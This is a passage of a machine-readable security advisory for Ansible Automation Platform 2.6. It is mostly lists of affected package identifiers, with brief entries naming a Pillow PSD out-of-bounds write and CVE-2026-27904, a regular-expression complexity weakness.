"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
